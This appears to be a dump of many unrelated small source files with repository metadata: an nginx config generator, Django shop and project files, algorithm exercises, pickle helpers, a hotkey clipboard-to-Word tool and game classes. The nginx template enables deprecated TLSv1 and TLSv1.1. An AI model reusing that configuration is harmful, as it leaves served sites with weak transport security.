user nginx;
worker_processes auto;
worker_rlimit_nofile 100000;
events {
worker_connections 2048;
}
http {
include /etc/nginx/mime.types;
default_type application/octet-stream;
keepalive_timeout 65;
include /etc/nginx/conf.d/*.conf;
server {
server_name %s;
listen 443 ssl;
ssl_certificate /etc/letsencrypt/live/%s/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/%s/privkey.pem;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_prefer_server_ciphers on;
#ssl_dhparam /etc/ssl/certs/dhparam.pem;
#ssl_ciphers 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA';
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:50m;
ssl_stapling on;
ssl_stapling_verify on;
add_header Strict-Transport-Security max-age=15768000;
location / {
proxy_pass http://localhost:%s;
proxy_pass_header Server;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_pass_header Server;
proxy_connect_timeout 3s;
proxy_read_timeout 10s;
}
}
}
'''
def main():
    """Render the nginx config template to ./nginx.conf.

    Expects two command-line arguments: the server domain and the local
    port to proxy to. Prints an error message when they are missing.
    """
    if len(sys.argv) <= 2:
        print("command error.")
        return
    domain = sys.argv[1]
    forward_port = sys.argv[2]
    # The module-level template has three %s slots for the domain (server
    # name plus the two certificate paths) and one for the upstream port.
    with open('nginx.conf', 'w') as f:
        f.write(template % (domain, domain, domain, forward_port))
if __name__ == '__main__':
main()
| [
"unknown0xff@protonmail.com"
] | unknown0xff@protonmail.com |
e13126c0e92fd4d20c09e724782792fd56bdc4d0 | 29ee2c8cfca177affdcfee96f369bdb3e8d21cda | /SDLabs/SDOM/PY/injection.py | f3506070d021dc13045da9f903c6a305b6319777 | [
"BSD-3-Clause"
] | permissive | hippiejesus/SDOM | fb9d5fb32d43b602a83bab089a54b9d735789c0c | 271328e306343dbc2f76269317950993cf5d9b4e | refs/heads/master | 2020-03-16T05:49:01.770746 | 2018-07-11T23:39:27 | 2018-07-11T23:39:27 | 132,541,179 | 0 | 0 | BSD-3-Clause | 2018-07-11T23:39:28 | 2018-05-08T02:15:32 | Python | UTF-8 | Python | false | false | 772 | py | import classes as cl
# One-shot maintenance script: load the persisted SDOM state, wipe every
# archive list on the shared inventory object, then save it back.
cl.load()
cl.inv.listAllCompaniesArchive = []
cl.inv.listAllEmployeesArchive = []
cl.inv.listAllRunsArchive = []
cl.inv.listAllBagsArchive = []
cl.inv.listAllTotesArchive = []
cl.inv.listFinishedBagsArchive = []
cl.inv.listFinishedTotesArchive = []
cl.inv.listAllUnfinishedProductArchive = []
cl.inv.listAllFinishedProductArchive = []
#cl.inv.listAllSourcesArchive = []
cl.inv.listAllContactsArchive = []
cl.inv.listAllDestinationsArchive = []
cl.inv.listAllLocationsArchive = []
cl.inv.listAllShipmentsArchive = []
cl.inv.listAllContainersArchive = []
cl.inv.listAllSoldProductArchive = []
cl.inv.listAllTransactionsArchive = [] #All pending transactions
# NOTE(review): 'Reciepts' is misspelled but must match the attribute name
# used by the 'classes' module, so it is left as-is.
cl.inv.listAllRecieptsArchive = [] #All closed transactions
cl.save()
print('save success')
| [
"noreply@github.com"
] | noreply@github.com |
7b47523319212979e6f3b6c237087b53e69b6d12 | 8b856e27bc39b3ac6cfabac0ba7b9803ab65cb74 | /users/urls.py | dc06cc234686069911998e2cee4e9d3981a2eb56 | [] | no_license | MilanSormaz/Bus-station | e65c5282bb10e8987be0318c562ee373454431d4 | e3b4f74d304f4c30b776945b8c0bc2dc935f015b | refs/heads/master | 2023-03-30T01:23:42.106925 | 2021-04-11T12:08:11 | 2021-04-11T12:08:11 | 356,855,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from django.urls import path
from . views import register
from . import views
from django.contrib.auth import views as authentication_views
app_name = 'users'
urlpatterns = [
path('register/', register, name='register'),
] | [
"msormaz@MILANSORMAZ.planetsoft.ba"
] | msormaz@MILANSORMAZ.planetsoft.ba |
94a6116c764873b6950b74de2e59c95f77bc89b1 | a8dfd770217d9aba083f1a9820914f7a3883237b | /fibb.py | 4d117302e97a60b67f6d886f7c44bd4eca4b100e | [] | no_license | Meghanaalla/sravani | 215113f095709ded30e5a47cc50398a271ffab56 | 53f4a6b78051d91f469f7399341b5f526986ad78 | refs/heads/master | 2020-03-26T05:20:07.968892 | 2018-08-30T07:20:49 | 2018-08-30T07:20:49 | 144,551,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | nterms=int(raw_input())
n1=1
n2=1
count=0
if nterms==1:
print n1,
else:
while count<nterms:
print n1,
nth=n1+n2
n1=n2
n2=nth
count+=1
| [
"noreply@github.com"
] | noreply@github.com |
5f93cd10f917b5933f9628fbeb2356e722b262a9 | 726ba4ae7f0f7c6035d88a145ff1dd957317b57d | /app01/migrations/0003_auto_20171122_0859.py | 58f4e0277b2622b234359531760a07ce1cb762dc | [] | no_license | chrishug/s14day01 | 2305300291b2e6ecd558328d41cc01ac48c65274 | 2db3598d8dfc2812d26bdf1d1638d5b8d327efd8 | refs/heads/master | 2021-09-01T06:01:54.840797 | 2017-12-25T07:54:13 | 2017-12-25T07:54:13 | 115,318,671 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-22 00:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
# Auto-generated schema migration (Django 1.11, see file header): depends
# on 0002_userinfo_group and changes UserInfo.group into a ForeignKey to
# app01.Group with on_delete=CASCADE. Generated code -- edit with care.
dependencies = [
('app01', '0002_userinfo_group'),
]
operations = [
migrations.AlterField(
model_name='userinfo',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app01.Group'),
),
]
| [
"305165472@qq.com"
] | 305165472@qq.com |
e2553bf31614edf3ef91cdd52439d0a0721bc8d2 | e3fd35a8443aaf2f293ae03a5f6c819046a4dd21 | /leetcode-python/medium/_503_next_greater_element_2/test_solution.py | 68da2b92260a0e9bd3dc14ea7131a1cb31787adc | [] | no_license | hieutran106/leetcode-ht | 2223ea6bcd459c2cdbc33344c0ff69df7f8a3c7f | 8332eb20e613f82cda2e326218154c7803a32403 | refs/heads/main | 2023-08-09T02:52:41.360360 | 2023-07-27T10:12:28 | 2023-07-27T10:12:28 | 234,890,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 585 | py | import unittest
from .solution import Solution
class MyTestCase(unittest.TestCase):
# Unit tests for Solution.nextGreaterElements (LeetCode 503, "Next Greater
# Element II"): for each element of a circular array, find the first
# strictly greater element that follows it (wrapping around), else -1.
def setUp(self) -> None:
# A fresh Solution instance for every test.
self.s = Solution()
def test_case1(self):
actual = self.s.nextGreaterElements([1, 2, 1])
self.assertEqual(actual, [2, -1, 2])
def test_case2(self):
actual = self.s.nextGreaterElements([3, 1, 2, 4])
self.assertEqual(actual, [4, 2, 4, -1])
def test_case3(self):
actual = self.s.nextGreaterElements([3, 5, 2, 1])
self.assertEqual(actual, [5, -1, 3, 3])
if __name__ == '__main__':
unittest.main()
| [
"hieutran106@gmail.com"
] | hieutran106@gmail.com |
ce194e63f27b48f35a7a57f0c64bda97da86c689 | 17d9abd2b10267f67b40f293723414ba729b0e62 | /store/utils.py | 0ae037bd02355dc79d85f77b746d2436cb02ca33 | [] | no_license | khebizi/ecommerce | 229b7e2a261a7789f118001f35d7002bd396e2d0 | 8c02f035d522941bb2e5c76c98eac2f7e0e448bd | refs/heads/master | 2023-08-13T06:11:37.081364 | 2021-09-21T15:01:09 | 2021-09-21T15:01:09 | 403,760,377 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,305 | py | import json
from . models import *
def cookieCart(request):
    """Build cart data for an anonymous (not logged in) visitor.

    Reads the JSON 'cart' cookie mapping product id -> {'quantity': int}
    and resolves each entry against the Product table.

    Returns:
        dict with keys 'cartItems' (total quantity), 'order' (totals plus a
        'shipping' flag) and 'items' (list of per-product dicts).
    """
    try:
        cart = json.loads(request.COOKIES['cart'])
    except (KeyError, ValueError):
        # Narrowed from a bare except: KeyError = no 'cart' cookie yet,
        # ValueError covers invalid JSON (json.JSONDecodeError subclasses
        # it). Either way, start from an empty cart.
        cart = {}
    print('CART:', cart)  # NOTE(review): debug leftover; consider logging
    items = []
    order = {'get_cart_total': 0, 'get_cart_items': 0, 'shipping': False}
    cartItems = order['get_cart_items']
    for i in cart:
        # The try block keeps items whose product was removed from the
        # catalog from breaking the page; they are simply skipped.
        try:
            if cart[i]['quantity'] > 0:  # items with negative quantity = lot of freebies
                cartItems += cart[i]['quantity']
                product = Product.objects.get(id=i)
                total = (product.price * cart[i]['quantity'])
                order['get_cart_total'] += total
                order['get_cart_items'] += cart[i]['quantity']
                item = {
                    'id': product.id,
                    'product': {'id': product.id, 'name': product.name, 'price': product.price,
                                'imageURL': product.imageURL},
                    'quantity': cart[i]['quantity'],
                    'digital': product.digital,
                    'getTotal': total,
                }
                items.append(item)
                # Physical products require shipping (kept as '== False' so
                # a None/unknown 'digital' flag does not trigger shipping).
                if product.digital == False:
                    order['shipping'] = True
        except Exception:
            # Narrowed from a bare except so SystemExit/KeyboardInterrupt
            # still propagate; missing products are skipped as before.
            pass
    return {'cartItems': cartItems, 'order': order, 'items': items}
def cartData(request):
    """Return the cart context for any visitor.

    Authenticated users get their open (incomplete) Order from the
    database; anonymous visitors fall back to the cookie-based cart.
    Result keys: 'cartItems', 'order', 'items'.
    """
    if not request.user.is_authenticated:
        guest = cookieCart(request)
        return {'cartItems': guest['cartItems'],
                'order': guest['order'],
                'items': guest['items']}
    customer = request.user.customer
    order, _created = Order.objects.get_or_create(customer=customer, complete=False)
    return {'cartItems': order.get_cart_items,
            'order': order,
            'items': order.orderitem_set.all()}
def guestOrder(request,data):
# Create a Customer and an open Order for a guest checkout, copying the
# cookie-cart items into OrderItem rows. Returns (customer, order).
# 'data' is the parsed checkout payload: data['form'] holds name/email.
print('COOKIES:', request.COOKIES)
name=data['form']['name']
email= data['form']['email']
# Reuse the cookie cart as the source of the ordered items.
cookieData= cookieCart(request)
items=cookieData['items']
# Reuse an existing customer record for this email, creating one if needed;
# the name is refreshed either way.
customer, created = Customer.objects.get_or_create(
email=email,
)
customer.name= name
customer.save()
order = Order.objects.create(
customer=customer,
complete=False,
)
# Materialize each cookie-cart entry as an OrderItem on the new order.
for item in items:
product = Product.objects.get(id=item['product']['id'])
orderItem = OrderItem.objects.create(
product= product,
order = order,
quantity = item['quantity']
)
return customer, order
"ha_khebizi@esi.dz"
] | ha_khebizi@esi.dz |
a3503117e55cbea4f116261c30a6f9f1beb731c2 | 8ec50102ba621cc048e9fa9830bf35cef441c435 | /Programming Concepts/logical_operators.py | 082ca38c0a9a539971e430a14fa3d40dcf00d5b9 | [] | no_license | TanveerAhmed98/Full-Stack-Programming | 7672b696513bd2dc624c25ce37edb30891510fff | f340b9fbc6e70c92b2ba3d5c3a0e23ebc8686503 | refs/heads/master | 2023-06-15T23:10:16.693984 | 2021-07-10T13:38:25 | 2021-07-10T13:38:25 | 380,480,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | # and operator
print(True and True)
print(True and False)
print(False and True)
print(False and False)
# or operator
print(True or True)
print(True or False)
print(False or True)
print(False or False)
# not operator
print(not(True or False or False))
num = int(input("Please enter the number : "))
if (num % 2 == 0) and (num > 200):
print("The number is greater than 200 and even")
else:
print("The number is less than 200 or odd or both at a time")
| [
"tanveer.ahm98@gmail.com"
] | tanveer.ahm98@gmail.com |
50f40cf5fe4eeddfd739731d65089c3ef176b974 | 3a751dd11ad893d4222cc52148d0829de9f4029f | /django/django_extras/ajax_note/manage.py | 280f9446088e0e061158fa6cefe483cacf4818a9 | [] | no_license | higashizono33/python_stack | 76b5fc63a63913e309a545b7f586a99c684fa0d2 | 5ec93e384e911b9d05de54af232d464928b76e7e | refs/heads/master | 2023-04-18T23:18:21.569125 | 2021-04-26T02:40:55 | 2021-04-26T02:40:55 | 339,864,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
# Django's standard manage.py entry point: point DJANGO_SETTINGS_MODULE at
# this project's settings, then hand argv to Django's CLI dispatcher.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ajax_note.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
# Re-raise with a friendlier hint; 'from exc' preserves the original cause.
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"takashizono@gmail.com"
] | takashizono@gmail.com |
c42af3a2ce14d0a7a69408abef1650a90e836b3a | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /MY_REPOS/INTERVIEW-PREP-COMPLETE/Practice/BSTFromArray/model_solution/model_solution.py | f9d67e0ad74527a0da094829f9bcf5cb690108cf | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 2,162 | py | import math
def create_min_height_bst(sorted_array):
    """Build a minimum-height BST from an ascending ``sorted_array``.

    Delegates to rec_helper over the full index range; returns the root
    node, or None for an empty array.
    """
    return rec_helper(sorted_array, 0, len(sorted_array) - 1)
def rec_helper(sorted_array, left, right):
    """Recursively build a balanced BST from sorted_array[left..right].

    The midpoint of the range becomes the subtree root so both halves stay
    within one node of each other in size; an empty range yields None.
    """
    if right < left:
        return None
    mid = left + (right - left) // 2
    node = BinaryTreeNode(sorted_array[mid])
    node.left = rec_helper(sorted_array, left, mid - 1)
    node.right = rec_helper(sorted_array, mid + 1, right)
    return node
class BinaryTreeNode:
    """A node of a binary tree: a value plus left/right child links."""

    def __init__(self, value):
        # Children start empty; callers attach subtrees after construction.
        self.value = value
        self.left = None
        self.right = None
# Helper function to validate that the created tree is a valid BST
def is_BST(root, min_bound, max_bound):
    """Return True if the tree at ``root`` satisfies the BST invariant.

    Every value must lie within [min_bound, max_bound]; the bounds are
    tightened by +/- 1 per level, which assumes integer node values.
    An empty tree is trivially valid.
    """
    if root is None:
        return True
    if not (min_bound <= root.value <= max_bound):
        return False
    return (is_BST(root.left, min_bound, root.value - 1)
            and is_BST(root.right, root.value + 1, max_bound))
# Helper function to check the max height of a BST
def find_bst_max_height(node):
    """Return the height (in nodes) of the tree rooted at ``node``.

    An empty tree has height 0; a single node has height 1.
    """
    if node is None:
        return 0
    left_height = find_bst_max_height(node.left)
    right_height = find_bst_max_height(node.right)
    return max(left_height, right_height) + 1
# Helper function to validate that the given BST exhibits the min height
def is_bst_min_height(root, N):
    """Check that the tree at ``root`` has the minimal height for N nodes.

    The minimal height of a binary tree with N >= 1 nodes is
    floor(log2(N)) + 1. Previously N == 0 crashed with a math domain
    error from log2; an empty node count now simply requires an empty
    tree (height 0).
    """
    bst_max_height = find_bst_max_height(root)
    if N <= 0:
        return bst_max_height == 0
    should_equal = math.floor(math.log2(N)) + 1
    return bst_max_height == should_equal
# Helper function to count the number of nodes for a given BST
def count_bst_nodes(root, count):
    """Return *count* plus the number of nodes in the tree rooted at *root*.

    Bug fix: the original discarded the recursive results (ints are passed
    by value, so `count += 1` in a callee never reaches the caller) and fell
    off the end without a return, yielding None for every non-empty tree.
    """
    if root is None:
        return count
    count = count_bst_nodes(root.left, count)   # nodes in the left subtree
    count += 1                                  # this node
    return count_bst_nodes(root.right, count)   # nodes in the right subtree
# Some tests
sorted_array = [1, 2, 3, 4, 5, 6, 7]
bst = create_min_height_bst(sorted_array)
print(is_BST(bst, float("-inf"), float("inf"))) # should print true
print(is_bst_min_height(bst, len(sorted_array))) # should print true
sorted_array = [4, 10, 11, 18, 42, 43, 47, 49, 55, 67, 79, 89, 90, 95, 98, 100]
bst = create_min_height_bst(sorted_array)
print(is_BST(bst, float("-inf"), float("inf"))) # should print true
print(is_bst_min_height(bst, len(sorted_array))) # should print true
| [
"bryan.guner@gmail.com"
] | bryan.guner@gmail.com |
32900a77fe98385caef31b2d84a934479ab42690 | 0981f52175d33ce8d2d5f96161435e972b46dc04 | /binary_file/functions.py | e1125faf057eb09997dab29501721f2192771bb6 | [] | no_license | deepakmauryadev/python-file-handling | 100f6c403600fcc7660cdf86efae2cbe95431cba | 4ed13a183dcba53171b8dc82d262671b4cb4bebf | refs/heads/main | 2023-07-23T23:11:38.627586 | 2021-09-05T07:05:31 | 2021-09-05T07:05:31 | 403,120,403 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,584 | py | import pickle
def readBinaryData():
    """Read one pickled object from 'bindata.dat' and print it.

    An empty file (pickle raises EOFError) is silently ignored.
    Fix: use a context manager so the file is closed even if an
    exception other than EOFError escapes (the original leaked it).
    """
    with open("bindata.dat", "rb") as f:
        try:
            print(pickle.load(f))
        except EOFError:
            pass
def writeBinaryData():
    """Serialize a sample dict into 'bindata.dat', replacing its contents."""
    data = {
        "id": "0",
        "name": "writeBinaryData function"
    }
    # 'wb' truncates; the context manager guarantees close/flush even if
    # pickling raises (the original leaked the handle in that case).
    with open("bindata.dat", "wb") as f:
        pickle.dump(data, f)
def writeAndReadBinaryData():
    """Write a sample dict to 'bindata.dat', then read it back and print it."""
    data = {
        "id": "1",
        "name": "writeAndReadBinaryData function"
    }
    # 'wb+' truncates and allows reading after seeking back to the start;
    # the context manager guarantees the file is closed on any error path.
    with open("bindata.dat", "wb+") as f:
        pickle.dump(data, f)
        f.seek(0)
        try:
            print(pickle.load(f))
        except EOFError:
            pass
def appendBinaryData():
    """Merge {"nickname": ...} into the dict pickled in 'bindata.dat',
    rewrite the file, and print the updated contents.

    NOTE(review): rewriting from offset 0 without truncating can leave stale
    trailing bytes if the new pickle were shorter; unchanged here because the
    dict only grows and altering it would change the on-disk behavior.
    Fix: use a context manager so the file is closed on any error path.
    """
    with open("bindata.dat", "rb+") as f:

        def fetchBinaryData():
            # Re-read the pickled object from the start of the file.
            try:
                f.seek(0)
                return pickle.load(f)
            except EOFError:
                pass  # empty file -> returns None (dict() below then raises)

        bindata = dict(fetchBinaryData())
        bindata.update({"nickname": "appendBinaryData"})
        f.seek(0)
        pickle.dump(bindata, f)
        print(fetchBinaryData())
"68635898+deepakmauryadev@users.noreply.github.com"
] | 68635898+deepakmauryadev@users.noreply.github.com |
dc4e85942e9578012c8c1f6f472cbf15e08c8a22 | 647f3dad23077ef7bbdb8bb79c4ad6b78d1b648c | /chap4/4-8.py | 21c21069868fc51aeb623d3f06c397787c201e1b | [
"MIT"
] | permissive | StewedChickenwithStats/Answers-to-Python-Crash-Course | df818245985b092729c92af2f0d80f3b71b8eb20 | 9ffbe02abba5d111f702d920db7932303daf59d4 | refs/heads/main | 2023-07-18T05:23:20.946093 | 2021-09-08T01:44:17 | 2021-09-08T01:44:17 | 389,494,549 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 101 | py | cubes=[]
# Build the first ten cubes with a comprehension, then print one per line.
cubes = [value ** 3 for value in range(1, 11)]
for cube in cubes:
    print(cube)
"stella_gan@126.com"
] | stella_gan@126.com |
a0161734ebd9afefd02aedd34e2422a1934ee79a | 79fc1d1bd044d6fc361556a1e3b36e6d2af94c04 | /creditcard bisection.py | 2c99286f49cd0736e23401e0403290592512ecb2 | [] | no_license | Gmiller290488/MIT-6.01 | 51803f2e1d56f44219fd8e3b34ac2513622ba497 | c2960cc47109d5a6d6c862c5b76da71761dc873d | refs/heads/master | 2021-01-11T23:56:51.349529 | 2017-01-11T14:38:47 | 2017-01-11T14:38:47 | 78,647,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 12 18:58:24 2016
minimum credit card repayments to the pence
using bisection search
@author: Gmiller
"""
# NOTE(review): 'balance' and 'annualInterestRate' must be defined before this
# script runs (MIT 6.00x grader convention) -- confirm in the calling context.
monthlyInterestRate = annualInterestRate/12.0
# Bisection bounds for the fixed monthly payment: at least balance/12
# (no interest) and at most one twelfth of a fully compounded year.
lowerPayment = balance/12.0
upperPayment = ((balance*(1 + monthlyInterestRate)**12)/12.00)
newBalance = balance
# Bisect until a payment leaves a year-end balance that rounds to 0.
# NOTE(review): if balance == 0 the loop body never runs and 'guess' is
# undefined at the final print (NameError).
while newBalance != 0:
    guess = (upperPayment + lowerPayment) / 2
    newBalance = balance
    # Simulate 12 months: subtract the payment, then accrue a month of interest.
    for month in range(12):
        newBalance -= guess
        newBalance = newBalance + (newBalance*monthlyInterestRate)
    if round(newBalance, 0) == 0:
        break
    elif newBalance > 0:
        # Payment too small: debt remains -- raise the lower bound.
        lowerPayment = guess
    elif newBalance < 0:
        # Payment too large: overshot zero -- lower the upper bound.
        upperPayment = guess
print("Lowest Payment: ", round(guess, 2))
"gmiller290488@gmail.com"
] | gmiller290488@gmail.com |
4ed97237e85cb0a7d11bd881738cfdaef5c42744 | 117d254212e6f888e28abc3cf8c1993a78736ebf | /nsaid/wsgi.py | 47b0a92e97655fc8a6edd01c86761722211495d5 | [] | no_license | nsaid-team/gotopaws | db56af85e3e83e2117941c26e1f211f3f440ba26 | fe5240af2667d79f6451462ab4dc56e86fa3dece | refs/heads/master | 2020-12-24T14:27:27.687640 | 2015-09-01T17:36:36 | 2015-09-01T17:36:36 | 38,507,747 | 4 | 3 | null | 2015-07-22T03:00:41 | 2015-07-03T19:31:13 | HTML | UTF-8 | Python | false | false | 377 | py | """
WSGI config for nsaid project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the application.
# NOTE: assigning directly (not setdefault) overrides any value already
# present in the process environment.
os.environ['DJANGO_SETTINGS_MODULE'] = 'nsaid.settings'
# WSGI callable used by application servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| [
"npererar@utexas.edu"
] | npererar@utexas.edu |
c51e82ef5ab82087c69682991cef51b0315cbd94 | e03934835d0b3c60609edffbdd8e78f7c885f3ec | /Autopaste.pyw | b1701c50989a68cd4dffe2a85cac6fe741c79643 | [
"MIT"
] | permissive | ejaytc/Auto-Paste-Text | d24b1f6e764f513137977af1046e51c19f72af3b | 70dbce496330b31e9bad39669345525dbbe253f0 | refs/heads/master | 2020-07-13T11:35:33.367312 | 2019-08-29T05:05:26 | 2019-08-29T05:05:26 | 205,004,427 | 0 | 0 | MIT | 2019-08-29T03:38:41 | 2019-08-28T19:08:11 | Python | UTF-8 | Python | false | false | 1,805 | pyw | #!/usr/bin/env python3
from pynput.keyboard import Key, Listener, KeyCode
from docx import Document
import os, pyperclip, shelve, subprocess, re
def autopaste():
    """Append the current clipboard text as a new paragraph to the configured
    .docx file, creating the document if it does not exist yet.

    The target directory and filename come from the "AutopasteData" shelf.
    Fix: the shelf is now opened with a context manager so it is closed even
    if a key lookup raises (the original leaked it on KeyError).
    """
    with shelve.open("AutopasteData") as data:
        target_dir = data["path_"]
        target_file = data["file_"]
    check_(target_dir)  # make sure the destination directory exists
    new_document = os.path.join(target_dir, target_file)
    # Open the existing document when present, otherwise start a fresh one.
    if os.path.exists(new_document):
        document = Document(new_document)
    else:
        document = Document()
    document.add_paragraph(pyperclip.paste())
    document.save(new_document)
def open_ui():
    """Launch the settings UI script in a separate Python process."""
    check_(file_path)  # file_path is a module global assigned in __main__
    # Fixed command string with no user input, so shell=True is tolerable here.
    subprocess.call("python3 ApMainUi.pyw", shell=True)
def check_(file_path):
    """Ensure *file_path* exists as a directory, creating it if needed.

    Fix: makedirs(exist_ok=True) removes the exists()/mkdir() check-then-act
    race and also creates any missing parent directories.
    """
    os.makedirs(file_path, exist_ok=True)
# Hotkey table: each frozenset of held keys maps to the action it triggers.
# Shift+S pastes the clipboard into the document; Ctrl+Alt+U opens the UI.
# Both letter cases are listed because pynput reports the literal character.
COMBINATION = {
    frozenset([Key.shift, KeyCode(char = 'S')]): autopaste,
    frozenset([Key.shift, KeyCode(char = 's')]): autopaste,
    frozenset([Key.ctrl, Key.alt, KeyCode(char='U')]): open_ui,
    frozenset([Key.ctrl, Key.alt, KeyCode(char='u')]): open_ui
}
# Keys currently held down (maintained by on_press / on_released below).
current = set()
def on_press(key):
    """pynput callback: record *key* as held and fire any matching hotkey.

    Uses the module-level 'current' set and the COMBINATION table.
    """
    current.add(key)
    # Fire the action bound to the exact set of currently held keys, if any.
    if frozenset(current) in COMBINATION:
        COMBINATION[frozenset(current)]()
def on_released(key):
    """pynput callback: drop *key* (or every tracked key) from 'current'."""
    if key in current:
        current.remove(key)
    elif not current == None:
        # NOTE(review): 'current' is always a set, never None, so this branch
        # runs whenever an untracked key is released; it then clears every
        # remembered key -- apparently to avoid "stuck" modifiers.
        rm = list(current)
        for r in rm:
            current.remove(r)
if __name__ == "__main__":
    # NOTE(review): 'fformat' is compiled but never used in this file.
    fformat = re.compile(r'\D*.docx')
    # Seed default settings into the shelf on first run ('Check' flags
    # that initialization already happened; note the key test uses the
    # string 'True', not the boolean).
    data = shelve.open("AutopasteData")
    if not 'True' in dict(data):
        data["path_"] = "/home/jay/Documents/AutoPasteDocuments"
        data["file_"] = "pastedDoc-file.docx"
        data["Check"] = True
    file_path = data["path_"]
    data.close()
    check_(file_path)
    # Block forever, dispatching keyboard events to the callbacks above.
    with Listener(on_press=on_press, on_release=on_released) as listener:
        listener.join()
"ejaytc@gmail.com"
] | ejaytc@gmail.com |
233021bb5d02ef49c79cadfa8aa011b31b2e5f41 | 9ff35175433721aa159bf3f3d5bf48aae8f6a4f8 | /myapp/models.py | f64e1791e431443ad35583fbf6481911a8029289 | [] | no_license | karthikraja34/django-sample_project- | 92d0433145cc96c2de6383f9f32a0a554013343d | 935da535c2b4dc503727720539cb54059ff59c9b | refs/heads/master | 2020-03-23T13:50:50.429859 | 2018-07-19T13:21:44 | 2018-07-19T13:21:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | from django.db import models
class Entry(models.Model):
    """A single dated journal entry."""

    name = models.CharField(max_length = 100)
    date = models.DateTimeField()
    description = models.TextField()
    # Timestamp set once when the row is first saved.
    created = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return '{} {}'.format(self.name,self.date)
| [
"rajakarthik131@gmail.com"
] | rajakarthik131@gmail.com |
bf0e89240f4f37a580aab9569f8991173681907d | 8b28095954e5e0e08e5134add10f4cdb3dc43328 | /days/13-15 textgames/actors.py | d0267fa0661b8d1147aa6028a5b21846aefa9707 | [] | no_license | thompsta/100daysofcode-python | 35bfe4305f33548ed7d8bce6a76f88460f687783 | 7678e594ed64312590a0f30bb8c33b60aba13791 | refs/heads/master | 2021-01-06T17:52:03.147599 | 2020-02-29T01:45:11 | 2020-02-29T01:45:11 | 241,425,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,274 | py | import random
# classes are blueprints of the objects we want to create
# every method has the __init__ self, assign new fields (characteristics) with self
class Creature:
    """A basic game actor identified by a name and a power level."""

    def __init__(self, name, level):
        self.name = name
        self.level = level

    def defensive_roll(self):
        """Roll a 12-sided die and scale the result by this creature's level."""
        die_roll = random.randint(1, 12)
        return self.level * die_roll
# pass the Creature class as parameter so that you can inherit Creature characteristics
class Dragon(Creature):
    """A Creature whose defense is amplified by its scales and fire breath."""

    def __init__(self, name, level, scaliness, breaths_fire):
        # Let the base class store the shared name/level state.
        super().__init__(name, level)
        self.scaliness = scaliness
        self.breaths_fire = breaths_fire

    def defensive_roll(self):
        """Base creature roll, multiplied by scaliness and doubled for fire."""
        value = super().defensive_roll() * self.scaliness
        return value * 2 if self.breaths_fire else value
class Wizard(Creature):
    """A Creature that attacks others via opposed defensive rolls."""

    def attack(self, creature):
        """Return True when this wizard's roll meets or beats *creature*'s."""
        return self.defensive_roll() >= creature.defensive_roll()
| [
"noreply@github.com"
] | noreply@github.com |
